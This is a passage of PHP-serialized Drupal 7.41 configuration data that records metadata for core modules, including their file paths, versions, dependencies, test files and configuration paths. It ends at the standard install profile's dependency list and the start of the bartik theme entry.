page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"contextual.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:9:\"dashboard\";O:8:\"stdClass\":9:{s:8:\"filename\";s:34:\"modules/dashboard/dashboard.module\";s:4:\"name\";s:9:\"dashboard\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:9:\"Dashboard\";s:11:\"description\";s:136:\"Provides a dashboard page in the administrative interface for organizing administrative tasks and tracking information within your site.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:5:\"files\";a:1:{i:0;s:14:\"dashboard.test\";}s:12:\"dependencies\";a:1:{i:0;s:5:\"block\";}s:9:\"configure\";s:25:\"admin/dashboard/customize\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"dblog\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/dblog/dblog.module\";s:4:\"name\";s:5:\"dblog\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:16:\"Database logging\";s:11:\"description\";s:47:\"Logs and records system events to the database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"dblog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"field\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/field/field.module\";s:4:\"name\";s:5:\"field\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:5:\"Field\";s:11:\"description\";s:57:\"Field API to add fields to entities like nodes and users.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:4:{i:0;s:12:\"field.module\";i:1;s:16:\"field.attach.inc\";i:2;s:20:\"field.info.class.inc\";i:3;s:16:\"tests/field.test\";}s:12:\"dependencies\";a:1:{i:0;s:17:\"field_sql_storage\";}s:8:\"required\";b:1;s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:15:\"theme/field.css\";s:29:\"modules/field/theme/field.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:17:\"field_sql_storage\";O:8:\"stdClass\":9:{s:8:\"filename\";s:64:\"modules/field/modules/field_sql_storage/field_sql_storage.module\";s:4:\"name\";s:17:\"field_sql_storage\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:17:\"Field SQL storage\";s:11:\"description\";s:37:\"Stores field data in an SQL database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:22:\"field_sql_storage.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"field_ui\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/field_ui/field_ui.module\";s:4:\"name\";s:8:\"field_ui\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:8:\"Field UI\";s:11:\"description\";s:33:\"User interface for the Field API.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:13:\"field_ui.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"file\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/file/file.module\";s:4:\"name\";s:4:\"file\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"File\";s:11:\"description\";s:26:\"Defines a file field type.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/file.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"filter\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/filter/filter.module\";s:4:\"name\";s:6:\"filter\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7010\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"Filter\";s:11:\"description\";s:43:\"Filters content in preparation for display.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"filter.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:28:\"admin/config/content/formats\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"help\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/help/help.module\";s:4:\"name\";s:4:\"help\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"Help\";s:11:\"description\";s:35:\"Manages the display of online help.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"help.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"image\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/image/image.module\";s:4:\"name\";s:5:\"image\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7005\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:5:\"Image\";s:11:\"description\";s:34:\"Provides image manipulation tools.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"file\";}s:5:\"files\";a:1:{i:0;s:10:\"image.test\";}s:9:\"configure\";s:31:\"admin/config/media/image-styles\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:4:\"list\";O:8:\"stdClass\":9:{s:8:\"filename\";s:38:\"modules/field/modules/list/list.module\";s:4:\"name\";s:4:\"list\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7002\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"List\";s:11:\"description\";s:69:\"Defines list field types. Use with Options to create selection lists.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:5:\"field\";i:1;s:7:\"options\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/list.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"menu\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/menu/menu.module\";s:4:\"name\";s:4:\"menu\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:4:\"Menu\";s:11:\"description\";s:60:\"Allows administrators to customize the site navigation menu.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"menu.test\";}s:9:\"configure\";s:20:\"admin/structure/menu\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"node\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/node/node.module\";s:4:\"name\";s:4:\"node\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7015\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:4:\"Node\";s:11:\"description\";s:66:\"Allows content to be submitted to the site and displayed on pages.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"node.module\";i:1;s:9:\"node.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:21:\"admin/structure/types\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"node.css\";s:21:\"modules/node/node.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"number\";O:8:\"stdClass\":9:{s:8:\"filename\";s:42:\"modules/field/modules/number/number.module\";s:4:\"name\";s:6:\"number\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:6:\"Number\";s:11:\"description\";s:28:\"Defines numeric field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:11:\"number.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"options\";O:8:\"stdClass\":9:{s:8:\"filename\";s:44:\"modules/field/modules/options/options.module\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Options\";s:11:\"description\";s:82:\"Defines selection, check box and radio button widgets for text and numeric fields.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:12:\"options.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"overlay\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/overlay/overlay.module\";s:4:\"name\";s:7:\"overlay\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Overlay\";s:11:\"description\";s:59:\"Displays the Drupal administration interface in an overlay.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}}s:4:\"path\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/path/path.module\";s:4:\"name\";s:4:\"path\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:4:\"Path\";s:11:\"description\";s:28:\"Allows users to rename URLs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"path.test\";}s:9:\"configure\";s:24:\"admin/config/search/path\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:3:\"php\";O:8:\"stdClass\":9:{s:8:\"filename\";s:22:\"modules/php/php.module\";s:4:\"name\";s:3:\"php\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:10:\"PHP filter\";s:11:\"description\";s:50:\"Allows embedded PHP code/snippets to be evaluated.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"php.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:3:\"rdf\";O:8:\"stdClass\":9:{s:8:\"filename\";s:22:\"modules/rdf/rdf.module\";s:4:\"name\";s:3:\"rdf\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:3:\"RDF\";s:11:\"description\";s:148:\"Enriches your content with metadata to let other applications (e.g. search engines, aggregators) better understand its relationships and attributes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:8:\"rdf.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"search\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/search/search.module\";s:4:\"name\";s:6:\"search\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"Search\";s:11:\"description\";s:36:\"Enables site-wide keyword searching.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:19:\"search.extender.inc\";i:1;s:11:\"search.test\";}s:9:\"configure\";s:28:\"admin/config/search/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"search.css\";s:25:\"modules/search/search.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"shortcut\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/shortcut/shortcut.module\";s:4:\"name\";s:8:\"shortcut\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:8:\"Shortcut\";s:11:\"description\";s:60:\"Allows users to manage customizable lists of shortcut links.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:13:\"shortcut.test\";}s:9:\"configure\";s:36:\"admin/config/user-interface/shortcut\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:10:\"statistics\";O:8:\"stdClass\":9:{s:8:\"filename\";s:36:\"modules/statistics/statistics.module\";s:4:\"name\";s:10:\"statistics\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"1\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:10:\"Statistics\";s:11:\"description\";s:37:\"Logs access statistics for your site.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"statistics.test\";}s:9:\"configure\";s:30:\"admin/config/system/statistics\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:6:\"system\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/system/system.module\";s:4:\"name\";s:6:\"system\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7080\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:6:\"System\";s:11:\"description\";s:54:\"Handles general site configuration for administrators.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:6:{i:0;s:19:\"system.archiver.inc\";i:1;s:15:\"system.mail.inc\";i:2;s:16:\"system.queue.inc\";i:3;s:14:\"system.tar.inc\";i:4;s:18:\"system.updater.inc\";i:5;s:11:\"system.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/system\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"taxonomy\";O:8:\"stdClass\":9:{s:8:\"filename\";s:32:\"modules/taxonomy/taxonomy.module\";s:4:\"name\";s:8:\"taxonomy\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7011\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:8:\"Taxonomy\";s:11:\"description\";s:38:\"Enables the categorization of content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"options\";}s:5:\"files\";a:2:{i:0;s:15:\"taxonomy.module\";i:1;s:13:\"taxonomy.test\";}s:9:\"configure\";s:24:\"admin/structure/taxonomy\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:4:\"text\";O:8:\"stdClass\":9:{s:8:\"filename\";s:38:\"modules/field/modules/text/text.module\";s:4:\"name\";s:4:\"text\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7000\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:4:\"Text\";s:11:\"description\";s:32:\"Defines simple text field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:9:\"text.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}}s:7:\"toolbar\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/toolbar/toolbar.module\";s:4:\"name\";s:7:\"toolbar\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:7:\"Toolbar\";s:11:\"description\";s:99:\"Provides a toolbar that shows the top-level administration menu items and links from other modules.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}}s:6:\"update\";O:8:\"stdClass\":9:{s:8:\"filename\";s:28:\"modules/update/update.module\";s:4:\"name\";s:6:\"update\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7001\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:14:\"Update manager\";s:11:\"description\";s:104:\"Checks for available updates, and can securely install or update modules and themes via a web interface.\";s:7:\"version\";s:4:\"7.41\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"update.test\";}s:9:\"configure\";s:30:\"admin/reports/updates/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"user\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/user/user.module\";s:4:\"name\";s:4:\"user\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7018\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:15:{s:4:\"name\";s:4:\"User\";s:11:\"description\";s:47:\"Manages the user registration and login system.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"user.module\";i:1;s:9:\"user.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/people\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"user.css\";s:21:\"modules/user/user.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:8:\"standard\";O:8:\"stdClass\":9:{s:8:\"filename\";s:34:\"profiles/standard/standard.profile\";s:4:\"name\";s:8:\"standard\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:4:\"1000\";s:4:\"info\";a:15:{s:4:\"name\";s:8:\"Standard\";s:11:\"description\";s:51:\"Install with commonly used features pre-configured.\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:21:{i:0;s:5:\"block\";i:1;s:5:\"color\";i:2;s:7:\"comment\";i:3;s:10:\"contextual\";i:4;s:9:\"dashboard\";i:5;s:4:\"help\";i:6;s:5:\"image\";i:7;s:4:\"list\";i:8;s:4:\"menu\";i:9;s:6:\"number\";i:10;s:7:\"options\";i:11;s:4:\"path\";i:12;s:8:\"taxonomy\";i:13;s:5:\"dblog\";i:14;s:6:\"search\";i:15;s:8:\"shortcut\";i:16;s:7:\"toolbar\";i:17;s:7:\"overlay\";i:18;s:8:\"field_ui\";i:19;s:4:\"file\";i:20;s:3:\"rdf\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;s:6:\"hidden\";b:1;s:8:\"required\";b:1;s:17:\"distribution_name\";s:6:\"Drupal\";}}}s:5:\"theme\";a:6:{s:6:\"bartik\";O:8:\"stdClass\":10:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s